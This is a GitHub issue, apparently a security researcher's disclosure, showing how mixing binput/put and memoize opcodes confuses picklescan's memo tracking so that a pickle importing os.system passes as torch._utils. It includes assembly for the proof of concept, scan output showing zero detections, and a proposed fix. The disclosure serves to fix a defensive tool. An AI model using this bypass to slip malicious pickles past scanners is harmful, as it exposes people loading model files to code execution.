Dangerous global detection bypass with memo dict confusion
dennis-doyensec opened this issue · 2 comments
Info
The picklescan
tool attempts to keep track of the memo dict by parsing the
memoize
opcodes whenever seen. The binput
and put
instructions also
insert objects into the memo but are left unhandled. While a legitimate python3
pickle should never mix *put
and memoize
instructions, doing so is accepted
by pickle.load
.
Malware can potentially set up the memo using a mix of these opcodes so that
picklescan
thinks memo[0]
contains a safe module name like torch._utils
when it actually contains a dangerous one. Used in conjunction with binget
and stack_global
instructions and any arbitrary python import can be made to look
safe to picklescan
.
Example
The following example uses radare2 (rasm2
and r2
commands) with the r2pickledec
plugin.
This following memo.asm
file is commented to explain the bypass. Comments
start with ;
.
;; Dangerous strings added to memo
binstring "os" ;; module name for os.system
binput 0 ;; memo[0] = stack[-1] = "system"
binstring "system" ;; function name for os.system
binput 1 ;; memo[1] = stack[-1] = "system"
;; Safe strings added to memmo
binstring "torch._utils"
memoize
binstring "_rebuild_tensor_v2"
memoize
;; State of memo
;; real memmo looks like
;;; memo = {0: "os", 1: "system", 2: "torch._utils", 3: "_rebuild_tensor_v2"}
;;; picklescan's memo looks like
;;; memo = {0: "torch._utils", 1: "_rebuild_tensor_v2"}
binget 0 ;; "os" but picklescan thinks it's "torch._utils"
binget 1 ;; "system" but picklescan thinks it's "_rebuild_tensor_v2"
stack_global ;; really: "os.system" but Picklescan thinks this is "torch._utils._rebuild_tensor_v2"
stop
The pickle can be assembled with rasm2
.
$ rasm2 -a pickle -Bf memo.asm > memo.pickle
Decompiling the pickle with r2
may help with understanding.
# r2 -a pickle -qqc 'pdP' memo.pickle
## VM stack start, len 5
## VM[4]
str_x0 = "os"
## VM[3]
str_x9 = "system"
## VM[2]
str_x16 = "torch._utils"
## VM[1]
str_x28 = "_rebuild_tensor_v2"
## VM[0] TOP
return _find_class(str_x0, str_x9)
The pickle will return os.system
when loaded, proving access to a
dangerous function without a detection by picklescan
.
$ python3 -m pickle memo.pickle
<built-in function system>
$ picklescan -p memo.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
Fix
A legitimate pickle that uses memoize
should not use binput
or put
. So
the simplest fix is to mark any pickle that contains a memoize
instruction
and either a binput
or put
instructions as dangerous.
Attempting to parse the memo without a full AST is error prone. The
r2pickledec
is the only tool I am aware of that will produce a
full AST for all python pickle instructions. Running pdPj
will produce the
following JSON for the above pickle.
$ r2 -a pickle -qqc 'pdPj~{}' picks/memo.pickle
{
"stack": [
{
"offset": 0,
"type": "PY_STR",
"value": "os"
},
{
"offset": 9,
"type": "PY_STR",
"value": "system"
},
{
"offset": 22,
"type": "PY_STR",
"value": "torch._utils"
},
{
"offset": 40,
"type": "PY_STR",
"value": "_rebuild_tensor_v2"
},
{
"offset": 68,
"type": "PY_GLOB",
"value": {
"module": {
"offset": 0,
"type": "PY_STR",
"prev_seen": ".stack[0]"
},
"name": {
"offset": 9,
"type": "PY_STR",
"prev_seen": ".stack[1]"
}
}
}
],
"popstack": [
]
}
Using r2pickledec
in picklescan is possible through r2pipe
but would
require adding dependencies that are not trivially installed with just pip
.
I am the author of the pickle architecture in r2
and the r2pickledec
plugin. So I can offer som help if desired.
A warning on using proto
for a fix
Since the offending opcodes are protocol 2 instructions, it might be tempting
to only accept them when a pickle starts with proto 2
. This won't work. A
pickle can redeclare it's protocol version at will without any unpickling
error. Additionally, a pickle that has declared itself as proto 2
still has
access to protocol 4 instructions.
Thanks! Investigating.
A legitimate pickle that uses memoize should not use binput or put
If the pickle spec prohibits this, then the "simple fix" is what I'd go for.
I'll take a look on my side too!